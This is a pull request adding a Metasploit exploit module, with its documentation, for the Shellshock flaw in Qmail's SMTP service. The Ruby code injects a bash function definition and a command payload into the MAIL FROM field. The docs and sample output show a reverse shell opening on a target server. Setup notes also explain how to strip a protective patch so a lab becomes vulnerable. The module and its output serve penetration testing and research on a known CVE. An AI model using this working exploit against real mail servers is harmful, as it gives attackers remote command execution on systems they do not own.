### PR TITLE
Add qmail_bash_env_exec exploit module (Qmail shellshock exploit)

### DIFF
--- a/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md
+++ b/documentation/modules/exploit/unix/smtp/qmail_bash_env_exec.md
@@ -1,0 +1,82 @@
+## Vulnerable Application
+
+Any qmail version (works on latest versions, qmail-1.03 and netqmail-1.06) running on a system with a vulnerable BASH (Shellshock). In order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.
+
+## Setting up a vulnerable environment
+
+Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd.
+
+## Verification Steps
+
+  1. `use exploit/unix/smtp/qmail_bash_env_exec`
+  2. `set RHOST <target IP>`
+  3. `set MAILTO <valid e-mail recipient>`
+  4. `set payload cmd/unix/reverse`
+  5. `set LHOST <local IP>`
+  7. optionally set `RPORT` and `LPORT`
+  8. `exploit`
+  9. **Verify** a new shell session is started
+  
+## Options
+
+**MAILTO**
+
+A valid e-mail recipient. Usually, admin@targetdomain.com can be used.
+
+## Sample Output
+**Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).**
+
+```
+msf > use exploit/unix/smtp/qmail_bash_env_exec 
+msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113
+rhost => 192.168.1.113
+msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test"
+mailto => admin@testqmail2.test
+msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse
+payload => cmd/unix/reverse
+msf exploit(qmail_bash_env_exec) > show options 
+
+Module options (exploit/unix/smtp/qmail_bash_env_exec):
+
+   Name    Current Setting        Required  Description
+   ----    ---------------        --------  -----------
+   MAILTO  admin@testqmail2.test  yes       TO address of the e-mail
+   RHOST   192.168.1.113          yes       The target address
+   RPORT   25                     yes       The target port (TCP)
+
+
+Payload options (cmd/unix/reverse):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.102    yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf exploit(qmail_bash_env_exec) > run
+
+[*] Started reverse TCP double handler on 192.168.1.102:4444 
+[*] 192.168.1.113:25 - Sending the payload...
+[*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo RvZfov9i2ZuveLXA;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "RvZfov9i2ZuveLXA\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200
+
+whoami
+vpopmail
+```

--- a/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
+++ b/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
@@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote
               # telnet ruby python and perl works only if installed on target
             }
         },
-      'Targets'        => [ [ 'Linux Universal', { }] ],
+      'Targets'        => [ [ 'Automatic', { }] ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Sep 24 2014'
     ))

--- a/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
+++ b/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
@@ -1,0 +1,109 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/smtp'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Smtp
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
+      'Description'    => %q{
+        This module exploits a shellshock vulnerability on Qmail, a public
+        domain MTA written in C that runs on Unix systems.
+        Due to the lack of validation on the MAIL FROM field, it is possible to
+        execute shell code on a system with a vulnerable BASH (Shellshock).
+        This flaw works on the latest Qmail versions (qmail-1.03 and
+        netqmail-1.06).
+        However, in order to execute code, /bin/sh has to be linked to bash
+        (usually default configuration) and a valid recipient must be set on the
+        RCPT TO field (usually admin@exampledomain.com).
+        The exploit does not work on the "qmailrocks" community version
+        as it ensures the MAILFROM field is well-formed.
+      },
+      'Author'         =>
+        [
+          'Mario Ledo',
+          'Gabriel Follon'
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'References'     =>
+        [
+          ['CVE', '2014-6271'],
+          ['CWE', '94'],
+          ['OSVDB', '112004'],
+          ['EDB', '34765'],
+          ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x3e",
+          'Space'       => 888,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic telnet perl ruby python'
+              # telnet ruby python and perl works only if installed on target
+            }
+        },
+      'Targets'        => [ [ 'Linux Universal', { }] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 24 2014'
+    ))
+    deregister_options('MAILFROM')
+
+  end
+
+  def smtp_send(data = nil)
+    begin
+      result = ''
+      code = 0
+      sock.put("#{data}")
+      result = sock.get_once
+      result.chomp! if (result)
+      code = result[0..2].to_i if result
+      return result, code
+    rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
+      return result, 0
+    rescue ::Exception => e
+      print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
+      return nil, 0
+    end
+  end
+
+  def exploit
+    to = datastore['MAILTO']
+    connect
+    result = smtp_send("HELO localhost\r\n")
+    if result[1] < 200 || result[1] > 300
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    print_status('Sending the payload...')
+    result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
+    if result[1] < 200 || result[1] > 300
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    print_status("Sending RCPT TO #{to}")
+    result = smtp_send("rcpt to:<#{to}>\r\n")
+    if result[1] < 200 || result[1] > 300
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    result = smtp_send("data\r\n")
+    if result[1] < 200 || result[1] > 354
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
+    if result[1] < 200 || result[1] > 300
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    disconnect
+  end
+end

--- a/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
+++ b/modules/exploits/unix/smtp/qmail_bash_env_exec.rb
@@ -28,8 +28,9 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Mario Ledo',
-          'Gabriel Follon'
+          'Mario Ledo (Metasploit module)',
+          'Gabriel Follon (Metasploit module)',
+          'Kyle George (Vulnerability discovery)'
         ],
       'License'        => MSF_LICENSE,
       'Platform'       => ['unix'],
@@ -40,7 +41,8 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CWE', '94'],
           ['OSVDB', '112004'],
           ['EDB', '34765'],
-          ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
+          ['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
+          ['URL', 'https://lists.gt.net/qmail/users/138578']
         ],
       'Payload'        =>
         {


### PR DESCRIPTION
This module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH (Shellshock). This flaw works on the latest Qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.

#### Setting up a vulnerable environment
Install Qmail on a Linux server with a shellshock vulnerable bash. Ensure that /bin/sh is linked to bash. Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/) which apply a patch that checks the vulnerable MAILFROM parameter. This version (with the patch applied) is NOT vulnearble. If you are using this version, change the "int mfcheck()" function on qmail-smtpd.c and ensure it returns always 0 (after applying the patch) and re-compile qmail-smtpd.

#### Example Output
    msf > use exploit/unix/smtp/qmail_bash_env_exec 
    msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113
    rhost => 192.168.1.113
    msf exploit(qmail_bash_env_exec) > set mailto "admin@testqmail2.test"
    mailto => admin@testqmail2.test
    msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse
    payload => cmd/unix/reverse
    msf exploit(qmail_bash_env_exec) > show options 

    Module options (exploit/unix/smtp/qmail_bash_env_exec):

       Name    Current Setting        Required  Description
       ----    ---------------        --------  -----------
       MAILTO  admin@testqmail2.test  yes       TO address of the e-mail
       RHOST   192.168.1.113          yes       The target address
       RPORT   25                     yes       The target port (TCP)


    Payload options (cmd/unix/reverse):

       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       LHOST  192.168.1.102    yes       The listen address
       LPORT  4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Automatic


    msf exploit(qmail_bash_env_exec) > run

    [*] Started reverse TCP double handler on 192.168.1.102:4444 
    [*] 192.168.1.113:25 - Sending the payload...
    [*] 192.168.1.113:25 - Sending RCPT TO admin@testqmail2.test
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo RvZfov9i2ZuveLXA;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket B
    [*] B: "RvZfov9i2ZuveLXA\r\n"
    [*] Matching...
    [*] A is input...
    [*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200

    whoami
    vpopmail
